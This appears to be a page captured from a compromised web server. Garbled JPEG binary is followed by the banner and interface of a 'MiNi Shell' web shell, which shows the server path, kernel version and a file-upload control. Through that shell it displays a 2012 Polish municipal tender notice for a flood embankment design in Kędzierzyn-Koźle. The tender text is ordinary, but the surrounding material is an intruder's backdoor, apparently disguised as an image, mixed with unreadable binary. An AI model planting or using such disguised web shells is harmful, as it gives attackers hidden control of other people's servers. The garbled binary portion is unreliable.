JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120904/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120904/189515-N-2012.html

<p class="kh_header"><b>Kędzierzyn-Koźle: Koncepcja budowy wału przeciwpowodziowego wraz z zastawką na potoku Lineta od ul.Głubczyckiej do ul.Chrobrego</b><br>
<b>Numer ogłoszenia: 189515 - 2012; data zamieszczenia: 04.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kędzierzyn-Koźle, Urząd Miasta, Wydział Inżynierii Miejskiej , ul. Piramowicza 32, 47-200 Kędzierzyn-Koźle, woj. opolskie, tel. 77 4050380, faks 77 4050379.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kedzierzynkozle.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Koncepcja budowy wału przeciwpowodziowego wraz z zastawką na potoku Lineta od ul.Głubczyckiej do ul.Chrobrego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Cel i uwarunkowania inwestycji, do której odnosi się zamówienie publiczne

1.	Celem niniejszego zamówienia jest wyłonienie Wykonawcy na świadczenie usług projektowych związanych z wykonaniem Koncepcji wału przeciwpowodziowego wraz z zastawką na potoku Lineta od ul. Głubczyckiej do ul. Chrobrego w Kędzierzynie-Koźlu. Opracowując wariantową koncepcję jego przebiegu projektant wskaże Zamawiającemu najbardziej optymalny, możliwy do realizacji projekt wału przeciwpowodziowego na odcinku od ul.Głubczyckiej do ul.Chrobrego.
2.	Gmina Kędzierzyn-Koźle ma uchwalony miejscowy plan zagospodarowania przestrzennego miasta (oznaczony dalej skrótem m.p.z.p.), zatwierdzony Uchwałą Rady Miasta Kędzierzyn-Koźle Nr IX_98_2003 z dnia 22.05.2003 r. (Dziennik Urzędowy Województwa Opolskiego Nr 50, poz. 1038 z dnia 01.07.2003 r.) oraz uchwała nr XXII _243_2000 z 27.01.2000r (Dziennik Urzędowy Województwa Opolskiego nr 20 poz.75 z dnia 17.03.2000r - rejon ul. Głubczyckiej), ale realizacja tej inwestycji będzie prowadzona w trybie ustawy z dnia 8 lipca 2010 o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz.U. z 2010r nr 143 poz. 963) zwanej specustawą.
3.	Gmina Kędzierzyn - Koźle ma Plan operacyjny ochrony przed powodzią gminy Kędzierzyn-Koźle opracowany zgodnie z zarządzeniem nr 657_ZK_2012 Prezydenta Miasta z dnia 2 lutego 2012r w sprawie opracowania i wprowadzenia planu operacyjnego ochrony przed powodzią gminy Kędzierzyn-Koźle 

II.	Charakterystyka przedmiotu zamówienia 

1.	Przedmiotem zamówienia jest opracowanie koncepcji dwóch wariantów budowy wału przeciwpowodziowego, który wraz z zastawką na potoku Lineta umożliwi  przeprowadzenie wód powodziowych rzeki Odry po zachodnich obrzeżach gminy   Kędzierzyn - Koźle (tereny niezamieszkałe, nieużytki) i skierowanie ich kanałem ulgi Większyckiej Wody z powrotem do Odry. Zabezpieczy to przed zalaniem osiedla Koźle Stare Miasto i Koźle Zachód. 
Przewiduje się dwa warianty:
Wariant I - wał ziemny z elementami mobilnymi przebiegający prawym brzegiem Linety od ul. Głubczyckiej do ulicy Chrobrego, przepustem wałowym (zastawką) na Linecie, przebudową istniejącego przepustu drogowego
Wariant II - wał przeciwpowodziowy umożliwiający przeprowadzenie wód powodziowych po zachodnich obrzeżach miasta. Trasa przebiegu wału, technologia wykonania  - propozycja autora koncepcji. 
W obu wariantach musi być określony sposób podwyższenia pobocza ul. Chrobrego (od stadionu do przejazdu zlikwidowanej linii kolejowej nr 195 Koźle -Baborów)
Powyższe sugestie są niezbędnym minimum i nie ograniczają inwencji oraz propozycji autora koncepcji dla poszczególnych wariantów. 
Orientacyjna długość wału przeciwpowodziowego - 2,0 km.
Ostateczna długość wału wyniknie z koncepcji 
2.	Zakres zamierzenia określa się w sposób następujący: 
1) budowa wału na odcinku od ul.Głubczyckiej do ul.Chrobrego i osiągniecie parametrów dla wymaganej przepisami klasy wału zgodnie z rozporządzeniem Ministra Środowiska z dnia 20 kwietnia 2007r w sprawie warunków technicznych, jakim powinny odpowiadać budowle hydrotechniczne i ich usytuowanie (Dz. U. z 2007r nr 86, poz. 579)
2) wzmocnienie korony wału dla umożliwienia przejazdu podczas trwania akcji przeciwpowodziowej - przewidzieć drogę utwardzoną na koronie wału
3) wzdłuż projektowanego wału należy przewidzieć lokalizację przywałowych dróg konserwacyjnych
4) w obrębie budowy wału należy uwzględnić kolizje z liniami energetycznymi, z lokalnymi drogami itp. i przyjęcie odpowiednich rozwiązań projektowych
3.	Parametry projektowe wału (i innych urządzeń w ramach projektowanego wału) określi Wykonawca, po dokonaniu analizy powodzi w okresie lipiec 1997r 
4.	Na przedmiot zamówienia składają się następujące opracowania:
1) część ogólna
2) analiza uwarunkowań środowiskowych
3) część techniczna 
4) dokumentacja geodezyjno - prawna
5) zbiorcze zestawienie kosztów inwestycji 
6) porównanie wariantów i wnioski końcowe
7) materiały do uzyskania decyzji o środowiskowych uwarunkowaniach
5.	W ramach opracowania należy wykonać-uzyskać:
1) analizę dostępnych zdjęć, w tym lotniczych, wykonanych w okresie wezbrania powodziowego, materiałów archiwalnych, map
2) rozpoznanie warunków terenowych, pozwalających na stwierdzenie miejsc zagrożonych 
3) przygotowanie materiałów do uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia,
4) pozyskanie mapy ewidencyjnej wraz z wykazem właścicieli i władających
5) określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu, 
6) analizę powiązania inwestycji z mapami zagrożenia powodziowego, mapami ryzyka powodziowego, planami zarządzania ryzykiem powodziowym, o ile zostały opracowane, w przypadku braku tych materiałów należy dołączyć pismo potwierdzające brak map,
7) dokumentacja geotechniczna dla potrzeb budowy wału przeciwpowodziowego 
i posadowienia projektowanych obiektów, 
8) uzgodnienie wstępnych rozwiązań projektowych - koncepcji

6.	Założenia do projektowania:
1)	Dokumentacja musi być opracowana w sposób kompleksowy zgodny przepisami i zasadami wiedzy technicznej, przy czym w przypadku zmiany w trakcie wykonywania zamówienia przepisów prawa, norm, normatywów, wzorów, instrukcji lub wytycznych mających zastosowanie do opracowań i czynności składających się na przedmiot zamówienia Wykonawca zobowiązany jest do dostosowania tych opracowań i czynności do wprowadzanych zmian.
2)	Dokumentacja powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć, określonemu w pkt I.1. 
3)	Dokumentacja powinna być wewnętrznie spójna i skorelowana we wszystkich punktach opracowania, powinna zawierać optymalne rozwiązania funkcjonalne, użytkowe, konstrukcyjne, materiałowe i kosztowe.
4)	Zamawiający informuje, że preferuje nowoczesność w odniesieniu do rozwiązań technologicznych i materiałowych, spełniających wymagania funkcjonalno-użytkowe i programowe określone przez Wydział Zarządzania Kryzysowego Urzędu Miasta- uzgadniającą proponowane rozwiązania.
5)	Dokumentacja projektowa w swej treści powinna określać technologię robót, materiały, maszyny i urządzenia w sposób nie utrudniający uczciwej konkurencji.
6)	Zamawiający dopuszcza po wcześniejszym uzyskaniu jego akceptacji, wskazanie w dokumentacji projektowej na znak towarowy, patent lub pochodzenie z uzasadnionych względów technologicznych, ekonomicznych lub organizacyjnych, albo - jeżeli obowiązek taki wynika z odrębnych przepisów. W takim przypadku wskazaniu muszą towarzyszyć wyrazy -lub równoważny-.
7)	Zamawiający jest w posiadaniu następujących materiałów do projektowania, które są załącznikami do niniejszej SIWZ:
a.	Założenia do projektowania określone przez Wydział Zarządzania Kryzysowego
b.	Mapa poglądowa terenu projektowanej inwestycji

III.	Szczegółowy opis przedmiotu zamówienia

1.	W ramach przedmiotu zamówienia należy wykonać następujące opracowania:

A.	Część ogólna  
- ma charakter opisowo - graficzny, prezentuje warianty przebiegu projektowanego wału na tle obszarów objętych ochroną na podstawie  przepisów o ochronie przyrody oraz ochronie zabytków, na którą składają się:
	1) część opisowa 
	a) wprowadzenie opisujące : przedmiot opracowania, formalną podstawę opracowania, 
          wykaz materiałów wyjściowych i archiwalnych
	b) lokalizacja i cel zadania inwestycyjnego
	c) istniejące zagospodarowanie terenu
 	d) terenowe uwarunkowania realizacyjne
 	e) projektowane warianty wałów na tle zagospodarowania terenu
	f) zestawienie projektowanych wariantów - długości wałów, ilości i rodzaje 
          zabezpieczenia potoku Lineta oraz wskaźnikowe koszty wykonania wałów.
	2) część rysunkowa 
	    Plan orientacyjny - plan w skali 1:5000 lub 1:10000 przedstawiający warianty 
          wykonania wałów i wykonania przepustów wałowych i drogowych oraz zastawki 
          na Potoku Lineta z uwzględnieniem i oznaczeniem głównych elementów 
          istniejącego i projektowanego zagospodarowania terenu; elementami o 
          szczególnym znaczeniu do przedstawienia na planie są granice obszarów objętych 
          ochroną na podstawie przepisów o ochronie przyrody oraz ochronie zabytków. 
B.	Analiza uwarunkowań środowiskowych
1)	część opisowa 
a) krótki opis planowanego przedsięwzięcia budowy wału przeciwpowodziowego 
w obu wariantach, w tym charakterystyka planowanego przedsięwzięcia i opis zagospodarowania terenu w otoczeniu planowanych wariantów wałów.
- należy określić wrażliwość terenów, przez które przebiegają poszczególne warianty i wskazać te najbardziej odporne na uciążliwości powodowane przez przyszłą powódź a szczególności:
- wskazać obszary zalane w przypadku powodzi
- odnieść się do obszarów objętych ochroną w m.p.z.p. w przypadku powodzi. 
b) zwięzły opis elementów przyrodniczych środowiska, objętych zakresem przewidywanego oddziaływania planowanych poszczególnych wariantów przedsięwzięcia uwzględniający: 
1. elementy przyrodnicze środowiska
2. obszary chronione, określone na podstawie odrębnych przepisów
c) opis istniejących w sąsiedztwie lub bezpośrednim zasięgu oddziaływania planowanych wariantów przedsięwzięcia zabytków chronionych
- należy skonsultować go z właściwym organem ochrony zabytków dla terenu przedsięwzięcia
d) wstępna ocena oddziaływania na środowisko analizowanych wariantów, 
w szczególności na :
1) ludzi i ich dobra materialne
2) zwierzęta i rośliny
3) wody powierzchniowe i podziemne
4) krajobraz
5) zabytki i krajobraz kulturowy
e) ogólny opis możliwych do zastosowania dla każdego wariantu działań mających na celu zapobieganie, ograniczenie lub kompensację przyrodniczą negatywnych skutków oddziaływania na środowisko
d) analiza możliwych konfliktów społecznych związanych z planowanym przedsięwzięciem
e) źródła informacji stanowiące podstawę do sporządzenia analizy 
2) część rysunkowa 
Na mapach w skali 1:5000 lub 1: 10000 muszą być przedstawione wszystkie treści zawarte w analizie środowiskowej, w tym w szczególności:
a.	sposób użytkowania (rolne, leśne, zabudowy)
b.	obszary chronione w podziale na kategorie wymienione w ustawie o ochronie przyrody
c.	na osobnej mapie przedstawić konflikty środowiskowe i społeczne
d.	inwentaryzację przyrodniczą ze szczególnym uwzględnieniem siedlisk 
i gatunków podlegających ochronie zgodnie z obowiązującymi przepisami.
3) dokumentacja fotograficzna 
- ma przedstawiać newralgiczne odcinki planowanego przebiegu wału 
4) opinie, uzgodnienia

	C. Część techniczna 
	     - w sposób opisowo-graficzny należy przedstawić dane techniczne obiektów 
                    istniejących i zaprojektowanych w obu wariantach przedmiotowych wałów 
                    przeciwpowodziowych; prezentowane dane mają dotyczyć poszczególnych 
                    elementów, tj. : wał przeciwpowodziowy, przepusty wałowe, drogowe, zastawki 
                    na potoku Lineta ewentualnie innych obiektów nie związanych z wałami
1)	wał przeciwpowodziowy 
a) ustalenie przebiegu wałów przeciwpowodziowych i przyjęcie parametrów technicznych, z maksymalnym wykorzystaniem warunków terenowych, zminimalizowanie zajętości gruntów pod wał przeciwpowodziowy i wycinki drzew
b) ustalenie orientacyjnego przebiegu niwelety wału przeciwpowodziowego
d) ustalenie przekrojów poprzecznych
e) wybór konstrukcji wału 
f) określenie zakresu kolizji z urządzeniami infrastruktury technicznej i zakresu zmian w dotychczasowej infrastrukturze,
g) ustalenie granic wału przeciwpowodziowego
	      2) przepusty wałowe, drogowe, zastawki
		a) wskazanie miejsc przepustów i zastawki  
b) rozwiązania konstrukcyjnego 
3)opinie i uzgodnienia 
4) warunki techniczne budowy bądź przebudowy infrastruktury technicznej

	D. Dokumentacja geodezyjno - prawna  
- zakres opracowania ma obejmować w szczególności:
1)	pozyskanie i opracowanie mapy sytuacyjno-wysokościowej w skali i zakresie    umożliwiającym prawidłowe wykonanie koncepcji (lecz nie mniejszej niż 1:2000), przy czym jej zakres ma obejmować cały obszar oddziaływania inwestycji wraz z terenami przyległymi; treść mapy musi odpowiadać treści mapy zasadniczej z nakładką uzbrojenia terenu i ewidencji gruntów, uzupełnionej o elementy mogące mieć istotne znaczenie dla opracowania poszczególnych wariantów
2)	pozyskanie mapy ewidencyjnej wraz z wykazem właścicieli i władających
3)	w odniesieniu do poszczególnego wariantu:
a) przedstawienie przebiegu planowanej inwestycji na mapach sytuacyjno-         wysokościowych i ewidencyjnych
b) zestawienie działek (całych i dzielonych) objętych przyszłym wałem przeciwpowodziowym wraz z wstępnym określeniem powierzchni zajęcia, numeru KW, rodzaju użytku, właścicieli lub władających i ich adresów
c) zestawienie działek usytuowanych w bezpośrednim sąsiedztwie planowanej   inwestycji
	
F. Zbiorcze zestawienie kosztów inwestycji 

Dla każdego z dwóch wariantów należy wykonać uproszczony zbiorczy kosztorys wskaźnikowy uwzględniający wszystkie elementy koncepcji. W ramach ZZK koniecznym jest sporządzenie szacunkowego kosztu nabycia nieruchomości w granicach wyznaczonego wału przeciwpowodziowego.
	
G. Porównanie i wnioski końcowe  
	
- ma umożliwiać wskazanie wariantu najkorzystniejszego wg przyjętych kryteriów, najbardziej polecany do dalszych prac projektowych.
Należy przeprowadzić wielokryterialną analizę porównawczą wariantów, biorąc pod uwagę wyniki analiz przeprowadzonych we wszystkich wcześniejszych opracowaniach. Metoda analizy musi być oparta o jak największą liczbę kryteriów oceny i odpowiednio dobrane wagi. Mogą być także zastosowane metody nie uwzględniające wag, lecz bezpośrednią ocenę punktową. W miarę potrzeb może być wykonana za pomocą większej ilości metod.
Analizie musi być poddany każdy wariant zawierający wszystkie obiekty budowlane, jakie należy wykonać przy wykonywaniu wałów przeciwpowodziowych, jak również możliwości pozyskania gruntów pod przyszły wał.
Analiza ma zawierać:
1)	ogólny opis wariantów
2)	prezentację metod oceny - krótka ich charakterystyka wraz z podaniem ewentualnych źródeł uzyskania pełnych wersji
3)	kryteria oceny wariantów - wykaz kryteriów, zasady ich doboru, przyjęte wagi, powody pominięcia innych kryteriów
4)	zestawienie wyników analizy dla każdego z założonych kryteriów i dla każdego wariantu
5)	uszeregowanie wariantów od najkorzystniejszego wg przyjętych kryteriów
6)	wnioski końcowe

H. Materiały do uzyskania decyzji o środowiskowych uwarunkowaniach  

- należy przygotować wniosek z niezbędnymi załącznikami, w tym kartę informacyjną przedsięwzięcia, przygotowaną zgodnie z art. 3 ust.1 pkt 9 ustawy o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko w związku z ustawą Prawo ochrony środowiska.

2.  Przedmiot zamówienia należy skompletować w ilości:
1)	5 egz. wersji papierowej (nie dotyczy materiałów do uzyskania decyzji o środowiskowych uwarunkowaniach)
- wymaga się, aby każdy komplet przedmiotu zamówienia opakować osobno w praktyczną teczkę kartonową z rączką (nie stosować kartonów archiwizacyjnych) z przyklejoną odpowiednią stroną tytułową oraz spisem opracowań składających się na komplet;
2)	4 egz. wersji papierowej materiałów do uzyskania decyzji o środowiskowych uwarunkowaniach + 3 egz. wersji elektronicznej na płycie CD-R w formacie doc, pdf  
3)	2 egz. pozostałych materiałów w wersji elektronicznej na płycie CD-R, w tym część rysunkowa ma być kompatybilna z programem AUTO-CAD. Część opisowa kompatybilna z programem Word 2000 i Exel 2000 w formacie doc ,pdf, dxt i xls
- wymaga się ponadto, aby każdy dokument lub uzgodnienie wielostronicowe zeskanować do jednego pliku, a opis poszczególnych plików na nośniku elektronicznym ma jednoznacznie określać, co dany plik zawiera (proponowane oznaczenia należy odpowiednio dostosować do poszczególnych opracowań - warunek: muszą być niepowtarzalne w celu ich jednoznacznej identyfikacji).

3. Powyższe ilości egzemplarzy nie uwzględniają ilości opracowań niezbędnych do uzyskania 
    uzgodnień, opinii itp.

4.  Wykonawca na bieżąco będzie przekazywać Zamawiającemu kopie (kserokopie) uzyskanych warunków, uzgodnień i opinii o terminach umożliwiających ewentualne skorzystanie z trybu odwoławczego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2 290.00 zł (słownie: dwa tysiące dwieście dziewięćdziesiąt  00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni jako spełniających warunki udziału w postępowaniu tych Wykonawców, którzy posiadają doświadczenie w projektowaniu w okresie ostatnich trzech lat przez upływem terminu składania ofert, bądź w okresie prowadzonej działalności, jeżeli jast on krótszy niż wskazany, nie mniej niż jednej usługi, której przedmiotem było zamówienie o podobnych charakterze jak w niniejszym zamówieniu.
Zamawiający za podobne w rozumieniu niniejszego zapisu uważać będzie zaprojektowanie budowy, rozbudowy lub przebudowy wału przeciwpowodziowego o  długości nie mniejszej niż 2 km każdy.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oceniane będzie łączne spełnienie powyższego warunku udziału w postępowaniu przez wszystkich tych Wykonawców</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy w związku z art. 22 ust.1 PZP o spełnieniu warunków udziału w postępowaniu;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
